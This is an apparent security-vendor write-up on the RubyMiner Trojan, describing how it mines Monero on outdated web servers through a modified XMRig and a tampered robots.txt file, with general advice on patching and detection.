RubyMiner

RubyMiner is a Trojan that exploits the infected PC's resources for creating cryptocurrency for a remote attacker's wallet. Although it has no interface for the user, RubyMiner may be detectable by some of its minor symptoms, such as causing instability and bad performance in other programs. Users should have their anti-malware products eliminating RubyMiner and double-check their server software for any appropriate security updates that could prevent further attacks.

A Real Gem of a Mining Trojan

Half a year ago, malware analysts took notice of Trojan campaigns exploiting the XMRig application for making money out of its cryptocurrency 'mining' feature set. The latest iteration of this Black Hat business model, observable in the RubyMiner campaign, is attacking an enormous range of Web servers with little to no discrimination, except for searching for the presence of long-outdated vulnerabilities. RubyMiner also boasts from some extra changes to its XMRig component that differentiates it from the old versions of that program meaningfully.

RubyMiner's threat actors are using a breadth of attack scope to compensate for lack of subtlety, and use a handful of vulnerabilities dating back as long ago as 2012 to infect random Web servers around the world. A Unix-based scheduling application 'drops' the main payload: a version of XMRig that has had its five percent 'donation' to the author removed, which allows all of the Monero-based profits to go to the cybercrooks. Like any 'good' cryptocurrency-mining Trojan, RubyMiner has no victim-facing UI, and malware experts warn that any victims shouldn't assume that an infection is detectable by any visual symptoms.

Another aspect of RubyMiner that highlights its relative uniqueness is how it implements its scheduled tasks. Instead of running the mining routine on an hourly basis, RubyMiner re-downloads the compromised 'robots.txt' configuration file every time. While this downloading feature leaves a larger footprint for revealing the infection, it also lets the threat actors modify RubyMiner's behavior on the fly, including the possibility of implementing a 'turn off' or kill switch function.

Polishing Off a Gem-Inset Server Pandemic

RubyMiner's authors are running a server-based campaign that uses the ordinary 'robots.txt' component, a configuration file for searching Web robots, for accomplishing harmful feats it's not intended to do. Because all of the vulnerabilities of use in this campaign are outdated significantly, malware experts recommend updating all Web server software to eliminate the infection vectors that RubyMiner is abusing. At this time, roughly thirty percent of all Web servers around the world are targets of attempted, if not always successful, RubyMiner infections.

Because RubyMiner disguises its components as being part of the server's internal ecosystem, users may want to monitor their robots.txt file and related configuration storage containers for any unwarranted tampering. Cryptocurrency miners like RubyMiner, if left alone, may cause performance issues, or permanent hardware damage, to any individual, infected PC. However, standard anti-malware programs should experience no problems with deleting the RubyMiner's components, similarly to any other, non-server-based Trojan.

Although there's profit to find in a highly-precise and sophisticated Trojan attack, not every cybercrook operates with that degree of caution. When the threat actors are deploying Trojans like RubyMiner in the fashion of a blunderbuss or canon, subtlety is overrated.